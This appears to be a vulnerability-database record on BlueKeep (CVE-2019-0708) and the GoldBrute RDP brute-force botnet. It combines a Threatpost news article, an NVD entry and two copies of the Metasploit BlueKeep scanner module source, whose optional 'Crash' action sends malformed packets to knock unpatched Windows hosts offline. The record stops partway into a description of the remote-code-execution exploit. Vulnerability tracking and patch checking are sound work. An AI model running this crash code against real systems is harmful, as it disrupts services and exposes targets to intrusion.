{"id": "THREATPOST:BDEA819E4532E0D1FA016778F659F7E8", "type": "threatpost", "bulletinFamily": "info", "title": "Forget BlueKeep: Beware the GoldBrute", "description": "While everyone\u2019s talking about the [BlueKeep Mega-Worm](<https://threatpost.com/bluekeep-mega-worm-looms-as-fresh-poc-shows-full-system-takeover/145368/>), this is not the main monster to fear, according to recent web attack activity. Rather, a researcher is warning that the GoldBrute botnet poses the greatest threat to Windows systems right now.\n\nIn the past few days, GoldBrute (named after the Java class it uses) has attempted to brute-force Remote Desktop Protocol (RDP) connections for 1.5 million Windows systems and counting, according to Morphus Labs chief research officer Renato Marinho. The botnet is actively scanning the internet for machines with RDP exposed, and trying out weak or reused passwords to see if it can gain access to the systems.\n\nAfter initially spotting the activity earlier this week, \u201cafter six hours, we received 2.1 million IP addresses from the C2 server from which 1,596,571 are unique,\u201d Marinho wrote [in a posting](<https://morphuslabs.com/goldbrute-botnet-brute-forcing-1-5-million-rdp-servers-371f219ec37d>) on Thursday, adding that the botnet continues to swell in size (though he didn\u2019t quantify it). There are plenty of hosts to be had: Shodan reveals nearly 2.5 million [exposed RDP instances](<https://www.shodan.io/search?query=Remote+desktop>) as of this writing.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe danger could be extensive \u2014 RDP is used by tech support and IT admins to connect to and interact with machines remotely; it\u2019s also sometimes used by teleworking employees. Once an attacker has access to the connection, he or she has access to the Windows desktop and can set about doing anything the legitimate user would have permission to do. Obviously, pivoting into corporate networks, implanting malware, stealing information, and marshaling CPU resources for cryptomining or distributed denial-of-service attacks could all be on the cyberattack menu du jour for the GoldBrute operators.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/06/07120809/GoldBrute.png>)\n\nGoldBrute distribution as of June 6, 2019.\n\nSpeaking of whom, it turns out that the GoldBrute botnet is controlled by a single command-and-control (C2) server, associated with [an IP address in New Jersey](<https://myip.ms/view/ip_addresses/1755117824>). These adversaries could in theory carry all of the aforementioned attacks out on a large scale, all at once.\n\nAccording to the researcher, the C2 is exchanging data with the bots via AES-encrypted WebSocket connections to port 8333. An infected system will first be instructed to download the bot code (which is a very large 80MB package that includes the complete Java Runtime, Marinho said); once it has burrowed into its host, it starts scanning random IP addresses to find more hosts, and reporting the IP addresses back to the C2.\n\n\u201cAfter the bot reports 80 new victims, the C2 server will assign a set of targets to brute-force to the bot,\u201d Marinho said. \u201cEach bot will only try one particular username and password per target. This is possibly a strategy to fly under the radar of security tools, as each authentication attempt comes from different addresses.\u201d\n\nThe virulence of the activity should give admins pause, he added: \u201cWhile the reporting around this \u2018Bluekeep\u2019 vulnerability focused on patching vulnerable servers, exposing RDP to the internet has never been a good idea.\u201d\n\nThe BlueKeep critical remote code-execution vulnerability (CVE-2019-0708), for which a fully functioning exploit has been developed (but kept private by researchers), also lays open remote desktop services for attack. It\u2019s widely seen as the next big corporate threat, because it\u2019s wormable and requires no user interaction to spread. That\u2019s prompted the National Security Agency to warn of a potential [WannaCry-level event](<https://threatpost.com/the-wannacry-security-legacy-and-whats-to-come/144607/>).\n\nHowever, researchers at Duo Security pointed out that if the goal is to infiltrate via remote desktop, GoldBrute is the far easier route to go.\n\n\u201cGoldBrute highlights the fact that the bulk of scanning activity) for RDP isn\u2019t BlueKeep related,\u201d they wrote [in a posting](<https://duo.com/decipher/goldbrute-botnet-is-brute-forcing-windows-rdp>) on Thursday. \u201cWhen attackers can just bypass locked screens or guess weak RDP credentials, IT departments need to focus on making sure machines are not unnecessarily exposing RDP on the internet (putting a layer in between, such as a VPN, would help) and that users know how to use RDP properly.\u201d\n\nThat said, [patching the BlueKeep flaw](<https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/>) \u2013 which affects older version of Windows, including Windows 7, Windows XP, Server 2003, Server 2008 and Server 2008 R2 \u2013 should obviously also be on the top of the to-do list. Millions of systems remain vulnerable to it.\n\n**_Ransomware is on the rise: _**[**_Don\u2019t miss our free Threatpost webinar _**](<https://attendee.gotowebinar.com/register/611039692762707715?source=enews>)**_on the ransomware threat landscape, June 19 at 2 p.m. ET. _****_Join _****_Threatpost _****_and a panel of experts as they discuss_****_ how to manage the risk associated with this unique attack type,_** **_with exclusive insights into new developments on the ransomware front and how to stay ahead of the attackers._**\n", "published": "2019-06-07T17:15:57", "modified": "2019-06-07T17:15:57", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://threatpost.com/forget-bluekeep-beware-goldbrute/145482/", "reporter": "Tara Seals", "references": ["https://threatpost.com/bluekeep-mega-worm-looms-as-fresh-poc-shows-full-system-takeover/145368/", "https://morphuslabs.com/goldbrute-botnet-brute-forcing-1-5-million-rdp-servers-371f219ec37d", "https://www.shodan.io/search?query=Remote+desktop", "https://threatpost.com/newsletter-sign/", "https://media.threatpost.com/wp-content/uploads/sites/103/2019/06/07120809/GoldBrute.png", "https://myip.ms/view/ip_addresses/1755117824", "https://threatpost.com/the-wannacry-security-legacy-and-whats-to-come/144607/", "https://duo.com/decipher/goldbrute-botnet-is-brute-forcing-windows-rdp", "https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/", "https://attendee.gotowebinar.com/register/611039692762707715?source=enews"], "cvelist": ["CVE-2019-0708"], "lastseen": "2020-04-11T11:45:39", "viewCount": 312, "enchantments": {"score": {"value": 4.5, "vector": "NONE", "modified": "2020-04-11T11:45:39", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-0708"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/RDP/CVE_2019_0708_BLUEKEEP/", "MSF:AUXILIARY/SCANNER/RDP/CVE_2019_0708_BLUEKEEP", "MSF:EXPLOIT/WINDOWS/RDP/CVE_2019_0708_BLUEKEEP_RCE/", "MSF:EXPLOIT/WINDOWS/RDP/CVE_2019_0708_BLUEKEEP_RCE"]}, {"type": "f5", "idList": ["F5:K25238311"]}, {"type": "msrc", "idList": ["MSRC:4D3D99779455BE99499289F3B3A35F84", "MSRC:6A6ED6A5B652378DCBA3113B064E973B"]}, {"type": "kitploit", "idList": ["KITPLOIT:1986765330027575502", "KITPLOIT:8418780960315245103", "KITPLOIT:7915799087007906859", "KITPLOIT:1049860926455958760", "KITPLOIT:1225614657733366094", "KITPLOIT:3565898196234868215", "KITPLOIT:8309365460568193500", "KITPLOIT:998955151150716619", "KITPLOIT:6082359615438809301", "KITPLOIT:4482238198881011483"]}, {"type": "symantec", "idList": ["SMNTC-108273"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310108611", "OPENVAS:1361412562310814894"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994234", "MYHACK58:62201994152", "MYHACK58:62201994162", "MYHACK58:62201995234", "MYHACK58:62201994154", "MYHACK58:62201994259", "MYHACK58:62201994153", "MYHACK58:62201995881"]}, {"type": "ics", "idList": ["ICSMA-20-049-01"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:153133", "PACKETSTORM:154579"]}, {"type": "talosblog", "idList": ["TALOSBLOG:2401133934B407D6B7E1C6D91E886EBA", "TALOSBLOG:8DB6614E6048947EDBBD91681EE32AB7", "TALOSBLOG:2FC8F90E015AB54A7397D49B24BE5B5E", "TALOSBLOG:340B43701E5CA96D8B4491CD801FE010", "TALOSBLOG:E1AA5BBE6ECD7FF1CDF68AD1858BAA5A", "TALOSBLOG:F707E3F271E987A8739DBDECFEEFAE22", "TALOSBLOG:5A9BEF09DC8FF93E258E2D51361D11E8", "TALOSBLOG:C6C252288047D319ADE770A26A8DA196", "TALOSBLOG:AE189A67BCAD633AD9D7838F9DF4F6D5", "TALOSBLOG:62182E90D88C9282869F40D834CA56BA"]}, {"type": "threatpost", "idList": ["THREATPOST:08D7AB11C0B2B0668D71ADCEEB94DB1B", "THREATPOST:4F23E34A058045723339C103BC41A3D1", "THREATPOST:78996437466E037C7F29EFB1FFBBAB42", "THREATPOST:0D8008A1EF72C3A6059283D0D896B819", "THREATPOST:65FCA3BAD00F90651C42A5E6B1A291C3", "THREATPOST:58D6B44423A20EFC8CC4AD8B195A7228", "THREATPOST:472451689B2FA39FCB837D08B514FF91", "THREATPOST:54B8C2E27967886BC5CF55CA1E891C6C"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7549D87CE6E6AE596B8031184231ECD1"]}, {"type": "thn", "idList": ["THN:1BA2E3EE721856ECEE43B825656909B0", "THN:39C614DBFC7ED1BBBEAAD9DC8C04C7CD", "THN:3D0ED27488E8AFC91D99882663F7E35A"]}, {"type": "mssecure", "idList": ["MSSECURE:B42B640CBAB51E35DC07B81926B5F910", "MSSECURE:E0AA6CC56D602890BBD5AF46A036FE67"]}, {"type": "cisa", "idList": ["CISA:A5265FFF4C417EB767D82231D2D604B8", "CISA:81A1472B76D72ABF1AA69524AFD40F34"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20190529-01-WINDOWS"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:83C94B14C546544713E49B16CCCBF672"]}, {"type": "zdt", "idList": ["1337DAY-ID-33565", "1337DAY-ID-32978"]}, {"type": "exploitdb", "idList": ["EDB-ID:46946", "EDB-ID:47416", "EDB-ID:46904"]}, {"type": "mscve", "idList": ["MS:CVE-2019-0708"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:AE1D32AF43539C7362B2E060204A5413", "QUALYSBLOG:400D28FE44174674BB4561AA9416F532"]}, {"type": "nessus", "idList": ["SMB_NT_MS19_MAY_XP_2003.NASL"]}, {"type": "canvas", "idList": ["BLUEKEEP"]}, {"type": "attackerkb", "idList": ["AKB:131226A6-A1E9-48A1-A5D0-AC94BAF8DFD2"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:C90C58C22E53621B5A2A2AAEBCDF2EBC"]}], "modified": "2020-04-11T11:45:39", "rev": 2}, "vulnersScore": 4.5}}

{"cve": [{"lastseen": "2021-02-02T07:12:44", "description": "A remote code execution vulnerability exists in Remote Desktop Services formerly known as Terminal Services when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests, aka 'Remote Desktop Services Remote Code Execution Vulnerability'.", "edition": 11, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-05-16T19:29:00", "title": "CVE-2019-0708", "type": "cve", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0708"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/o:microsoft:windows_vista:-", "cpe:/o:microsoft:windows_server_2003:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_xp:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2003:r2", "cpe:/o:microsoft:windows_7:-"], "id": "CVE-2019-0708", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-0708", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2003:-:sp2:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_xp:-:sp3:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_server_2003:r2:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_xp:-:sp2:*:*:professional:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2003:-:sp2:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*"]}], "metasploit": [{"lastseen": "2021-02-13T04:54:30", "description": "This module checks a range of hosts for the CVE-2019-0708 vulnerability by binding the MS_T120 channel outside of its normal slot and sending non-DoS packets which respond differently on patched and vulnerable hosts. It can optionally trigger the DoS vulnerability.\n", "published": "2019-06-03T14:38:12", "type": "metasploit", "title": "CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-0708"], "modified": "2020-06-22T11:48:39", "id": "MSF:AUXILIARY/SCANNER/RDP/CVE_2019_0708_BLUEKEEP/", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::RDP\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check',\n 'Description' => %q{\n This module checks a range of hosts for the CVE-2019-0708 vulnerability\n by binding the MS_T120 channel outside of its normal slot and sending\n non-DoS packets which respond differently on patched and vulnerable hosts.\n It can optionally trigger the DoS vulnerability.\n },\n 'Author' =>\n [\n 'National Cyber Security Centre', # Discovery\n 'JaGoTu', # Module\n 'zerosum0x0', # Module\n 'Tom Sellers' # TLS support, packet documenentation, DoS implementation\n ],\n 'References' =>\n [\n [ 'CVE', '2019-0708' ],\n [ 'URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708' ],\n [ 'URL', 'https://zerosum0x0.blogspot.com/2019/05/avoiding-dos-how-bluekeep-scanners-work.html' ]\n ],\n 'DisclosureDate' => '2019-05-14',\n 'License' => MSF_LICENSE,\n 'Actions' => [\n ['Scan', 'Description' => 'Scan for exploitable targets'],\n ['Crash', 'Description' => 'Trigger denial of service vulnerability'],\n ],\n 'DefaultAction' => 'Scan',\n 'Notes' =>\n {\n 'Stability' => [ CRASH_SAFE ],\n 'AKA' => ['BlueKeep']\n }\n )\n )\n end\n\n def report_goods\n report_vuln(\n host: rhost,\n port: rport,\n proto: 'tcp',\n name: name,\n info: 'Behavior indicates a missing Microsoft Windows RDP patch for CVE-2019-0708',\n refs: references\n )\n end\n\n def run_host(ip)\n # Allow the run command to call the check command\n\n status = check_host(ip)\n if status == Exploit::CheckCode::Vulnerable\n print_good(status[1].to_s)\n elsif status == Exploit::CheckCode::Safe\n vprint_error(status[1].to_s)\n else\n vprint_status(status[1].to_s)\n end\n\n status\n end\n\n def rdp_reachable\n rdp_connect\n rdp_disconnect\n return true\n rescue Rex::ConnectionRefused\n return false\n rescue Rex::ConnectionTimeout\n return false\n end\n\n def check_host(_ip)\n # The check command will call this method instead of run_host\n status = Exploit::CheckCode::Unknown\n\n begin\n begin\n rdp_connect\n rescue ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError\n return Exploit::CheckCode::Safe('The target service is not running or refused our connection.')\n end\n\n status = check_rdp_vuln\n rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError, ::TypeError => e\n bt = e.backtrace.join(\"\\n\")\n vprint_error(\"Unexpected error: #{e.message}\")\n vprint_line(bt)\n elog(e)\n rescue RdpCommunicationError\n vprint_error('Error communicating RDP protocol.')\n status = Exploit::CheckCode::Unknown\n rescue Errno::ECONNRESET\n vprint_error('Connection reset')\n rescue StandardError => e\n bt = e.backtrace.join(\"\\n\")\n vprint_error(\"Unexpected error: #{e.message}\")\n vprint_line(bt)\n elog(e)\n ensure\n rdp_disconnect\n end\n\n status\n end\n\n def check_for_patch\n begin\n 6.times do\n _res = rdp_recv\n end\n rescue RdpCommunicationError\n # we don't care\n end\n\n # The loop below sends Virtual Channel PDUs (2.2.6.1) that vary in length\n # The arch governs which of the packets triggers the desired response\n # which is an MCS Disconnect Provider Ultimatum or a timeout.\n\n # Disconnect Provider message of a valid size for each platform\n # has proven to be safe to send as part of the vulnerability check.\n x86_string = '00000000020000000000000000000000'\n x64_string = '0000000000000000020000000000000000000000000000000000000000000000'\n\n if action.name == 'Crash'\n vprint_status('Sending denial of service payloads')\n # Length and chars are arbitrary but total length needs to be longer than\n # 16 for x86 and 32 for x64. Making the payload too long seems to cause\n # the DoS to fail. Note that sometimes the DoS seems to fail. Increasing\n # the payload size and sending more of them doesn't seem to improve the\n # reliability. It *seems* to happen more often on x64, I haven't seen it\n # fail against x86. Repeated attempts will generally trigger the DoS.\n x86_string += 'FF' * 1\n x64_string += 'FF' * 2\n else\n vprint_status('Sending patch check payloads')\n end\n\n chan_flags = RDPConstants::CHAN_FLAG_FIRST | RDPConstants::CHAN_FLAG_LAST\n channel_id = [1005].pack('S>')\n x86_packet = rdp_build_pkt(build_virtual_channel_pdu(chan_flags, [x86_string].pack('H*')), channel_id)\n\n x64_packet = rdp_build_pkt(build_virtual_channel_pdu(chan_flags, [x64_string].pack('H*')), channel_id)\n\n 6.times do\n rdp_send(x86_packet)\n rdp_send(x64_packet)\n\n # A single pass should be sufficient to cause DoS\n if action.name == 'Crash'\n sleep(1)\n rdp_disconnect\n\n sleep(5)\n if rdp_reachable\n print_error(\"Target doesn't appear to have been crashed. Consider retrying.\")\n return Exploit::CheckCode::Unknown\n else\n print_good('Target service appears to have been successfully crashed.')\n return Exploit::CheckCode::Vulnerable('The target appears to have been crashed by disconnecting from an incorrectly-bound MS_T120 channel.')\n end\n end\n\n # Quick check for the Ultimatum PDU\n begin\n res = rdp_recv(-1, 1)\n rescue EOFError\n # we don't care\n end\n return Exploit::CheckCode::Vulnerable('The target attempted cleanup of the incorrectly-bound MS_T120 channel.') if res&.include?(['0300000902f0802180'].pack('H*'))\n\n # Slow check for Ultimatum PDU. If it doesn't respond in a timely\n # manner then the host is likely patched.\n begin\n 4.times do\n res = rdp_recv\n # 0x2180 = MCS Disconnect Provider Ultimatum PDU - 2.2.2.3\n if res.include?(['0300000902f0802180'].pack('H*'))\n return Exploit::CheckCode::Vulnerable('The target attempted cleanup of the incorrectly-bound MS_T120 channel.')\n end\n end\n rescue RdpCommunicationError\n # we don't care\n end\n end\n\n Exploit::CheckCode::Safe\n end\n\n def check_rdp_vuln\n # check if rdp is open\n is_rdp, version_info = rdp_fingerprint\n unless is_rdp\n vprint_error('Could not connect to RDP service.')\n return Exploit::CheckCode::Unknown\n end\n rdp_disconnect\n rdp_connect\n is_rdp, server_selected_proto = rdp_check_protocol\n\n requires_nla = [RDPConstants::PROTOCOL_HYBRID, RDPConstants::PROTOCOL_HYBRID_EX].include? server_selected_proto\n product_version = (version_info && version_info[:product_version]) ? version_info[:product_version] : 'N/A'\n info = \"Detected RDP on #{peer} (Windows version: #{product_version})\"\n\n service_info = \"Requires NLA: #{(!version_info[:product_version].nil? && requires_nla) ? 'Yes' : 'No'}\"\n info << \" (#{service_info})\"\n\n vprint_status(info)\n\n if requires_nla\n vprint_status('Server requires NLA (CredSSP) security which mitigates this vulnerability.')\n return Exploit::CheckCode::Safe\n end\n\n chans = [\n ['cliprdr', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\n ['MS_T120', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_COMPRESS_RDP],\n ['rdpsnd', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP],\n ['snddbg', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP],\n ['rdpdr', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_COMPRESS_RDP],\n ]\n\n success = rdp_negotiate_security(chans, server_selected_proto)\n return Exploit::CheckCode::Unknown unless success\n\n rdp_establish_session\n\n result = check_for_patch\n\n if result == Exploit::CheckCode::Vulnerable\n report_goods\n end\n\n # Can't determine, but at least we know the service is running\n result\n end\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb"}, {"lastseen": "2020-10-13T17:08:23", "description": "This module checks a range of hosts for the CVE-2019-0708 vulnerability by binding the MS_T120 channel outside of its normal slot and sending non-DoS packets which respond differently on patched and vulnerable hosts. It can optionally trigger the DoS vulnerability.\n", "published": "2019-06-03T14:38:12", "type": "metasploit", "title": "CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-0708"], "modified": "2020-06-22T11:48:39", "id": "MSF:AUXILIARY/SCANNER/RDP/CVE_2019_0708_BLUEKEEP", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::RDP\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check',\n 'Description' => %q{\n This module checks a range of hosts for the CVE-2019-0708 vulnerability\n by binding the MS_T120 channel outside of its normal slot and sending\n non-DoS packets which respond differently on patched and vulnerable hosts.\n It can optionally trigger the DoS vulnerability.\n },\n 'Author' =>\n [\n 'National Cyber Security Centre', # Discovery\n 'JaGoTu', # Module\n 'zerosum0x0', # Module\n 'Tom Sellers' # TLS support, packet documenentation, DoS implementation\n ],\n 'References' =>\n [\n [ 'CVE', '2019-0708' ],\n [ 'URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708' ],\n [ 'URL', 'https://zerosum0x0.blogspot.com/2019/05/avoiding-dos-how-bluekeep-scanners-work.html' ]\n ],\n 'DisclosureDate' => '2019-05-14',\n 'License' => MSF_LICENSE,\n 'Actions' => [\n ['Scan', 'Description' => 'Scan for exploitable targets'],\n ['Crash', 'Description' => 'Trigger denial of service vulnerability'],\n ],\n 'DefaultAction' => 'Scan',\n 'Notes' =>\n {\n 'Stability' => [ CRASH_SAFE ],\n 'AKA' => ['BlueKeep']\n }\n )\n )\n end\n\n def report_goods\n report_vuln(\n host: rhost,\n port: rport,\n proto: 'tcp',\n name: name,\n info: 'Behavior indicates a missing Microsoft Windows RDP patch for CVE-2019-0708',\n refs: references\n )\n end\n\n def run_host(ip)\n # Allow the run command to call the check command\n\n status = check_host(ip)\n if status == Exploit::CheckCode::Vulnerable\n print_good(status[1].to_s)\n elsif status == Exploit::CheckCode::Safe\n vprint_error(status[1].to_s)\n else\n vprint_status(status[1].to_s)\n end\n\n status\n end\n\n def rdp_reachable\n rdp_connect\n rdp_disconnect\n return true\n rescue Rex::ConnectionRefused\n return false\n rescue Rex::ConnectionTimeout\n return false\n end\n\n def check_host(_ip)\n # The check command will call this method instead of run_host\n status = Exploit::CheckCode::Unknown\n\n begin\n begin\n rdp_connect\n rescue ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError\n return Exploit::CheckCode::Safe('The target service is not running or refused our connection.')\n end\n\n status = check_rdp_vuln\n rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError, ::TypeError => e\n bt = e.backtrace.join(\"\\n\")\n vprint_error(\"Unexpected error: #{e.message}\")\n vprint_line(bt)\n elog(e)\n rescue RdpCommunicationError\n vprint_error('Error communicating RDP protocol.')\n status = Exploit::CheckCode::Unknown\n rescue Errno::ECONNRESET\n vprint_error('Connection reset')\n rescue StandardError => e\n bt = e.backtrace.join(\"\\n\")\n vprint_error(\"Unexpected error: #{e.message}\")\n vprint_line(bt)\n elog(e)\n ensure\n rdp_disconnect\n end\n\n status\n end\n\n def check_for_patch\n begin\n 6.times do\n _res = rdp_recv\n end\n rescue RdpCommunicationError\n # we don't care\n end\n\n # The loop below sends Virtual Channel PDUs (2.2.6.1) that vary in length\n # The arch governs which of the packets triggers the desired response\n # which is an MCS Disconnect Provider Ultimatum or a timeout.\n\n # Disconnect Provider message of a valid size for each platform\n # has proven to be safe to send as part of the vulnerability check.\n x86_string = '00000000020000000000000000000000'\n x64_string = '0000000000000000020000000000000000000000000000000000000000000000'\n\n if action.name == 'Crash'\n vprint_status('Sending denial of service payloads')\n # Length and chars are arbitrary but total length needs to be longer than\n # 16 for x86 and 32 for x64. Making the payload too long seems to cause\n # the DoS to fail. Note that sometimes the DoS seems to fail. Increasing\n # the payload size and sending more of them doesn't seem to improve the\n # reliability. It *seems* to happen more often on x64, I haven't seen it\n # fail against x86. Repeated attempts will generally trigger the DoS.\n x86_string += 'FF' * 1\n x64_string += 'FF' * 2\n else\n vprint_status('Sending patch check payloads')\n end\n\n chan_flags = RDPConstants::CHAN_FLAG_FIRST | RDPConstants::CHAN_FLAG_LAST\n channel_id = [1005].pack('S>')\n x86_packet = rdp_build_pkt(build_virtual_channel_pdu(chan_flags, [x86_string].pack('H*')), channel_id)\n\n x64_packet = rdp_build_pkt(build_virtual_channel_pdu(chan_flags, [x64_string].pack('H*')), channel_id)\n\n 6.times do\n rdp_send(x86_packet)\n rdp_send(x64_packet)\n\n # A single pass should be sufficient to cause DoS\n if action.name == 'Crash'\n sleep(1)\n rdp_disconnect\n\n sleep(5)\n if rdp_reachable\n print_error(\"Target doesn't appear to have been crashed. Consider retrying.\")\n return Exploit::CheckCode::Unknown\n else\n print_good('Target service appears to have been successfully crashed.')\n return Exploit::CheckCode::Vulnerable('The target appears to have been crashed by disconnecting from an incorrectly-bound MS_T120 channel.')\n end\n end\n\n # Quick check for the Ultimatum PDU\n begin\n res = rdp_recv(-1, 1)\n rescue EOFError\n # we don't care\n end\n return Exploit::CheckCode::Vulnerable('The target attempted cleanup of the incorrectly-bound MS_T120 channel.') if res&.include?(['0300000902f0802180'].pack('H*'))\n\n # Slow check for Ultimatum PDU. If it doesn't respond in a timely\n # manner then the host is likely patched.\n begin\n 4.times do\n res = rdp_recv\n # 0x2180 = MCS Disconnect Provider Ultimatum PDU - 2.2.2.3\n if res.include?(['0300000902f0802180'].pack('H*'))\n return Exploit::CheckCode::Vulnerable('The target attempted cleanup of the incorrectly-bound MS_T120 channel.')\n end\n end\n rescue RdpCommunicationError\n # we don't care\n end\n end\n\n Exploit::CheckCode::Safe\n end\n\n def check_rdp_vuln\n # check if rdp is open\n is_rdp, version_info = rdp_fingerprint\n unless is_rdp\n vprint_error('Could not connect to RDP service.')\n return Exploit::CheckCode::Unknown\n end\n rdp_disconnect\n rdp_connect\n is_rdp, server_selected_proto = rdp_check_protocol\n\n requires_nla = [RDPConstants::PROTOCOL_HYBRID, RDPConstants::PROTOCOL_HYBRID_EX].include? server_selected_proto\n product_version = (version_info && version_info[:product_version]) ? version_info[:product_version] : 'N/A'\n info = \"Detected RDP on #{peer} (Windows version: #{product_version})\"\n\n service_info = \"Requires NLA: #{(!version_info[:product_version].nil? && requires_nla) ? 'Yes' : 'No'}\"\n info << \" (#{service_info})\"\n\n vprint_status(info)\n\n if requires_nla\n vprint_status('Server requires NLA (CredSSP) security which mitigates this vulnerability.')\n return Exploit::CheckCode::Safe\n end\n\n chans = [\n ['cliprdr', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\n ['MS_T120', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_COMPRESS_RDP],\n ['rdpsnd', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP],\n ['snddbg', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP],\n ['rdpdr', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_COMPRESS_RDP],\n ]\n\n success = rdp_negotiate_security(chans, server_selected_proto)\n return Exploit::CheckCode::Unknown unless success\n\n rdp_establish_session\n\n result = check_for_patch\n\n if result == Exploit::CheckCode::Vulnerable\n report_goods\n end\n\n # Can't determine, but at least we know the service is running\n result\n end\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb"}, {"lastseen": "2020-10-13T17:01:07", "description": "The RDP termdd.sys driver improperly handles binds to internal-only channel MS_T120, allowing a malformed Disconnect Provider Indication message to cause use-after-free. With a controllable data/size remote nonpaged pool spray, an indirect call gadget of the freed channel is used to achieve arbitrary code execution. Windows 7 SP1 and Windows Server 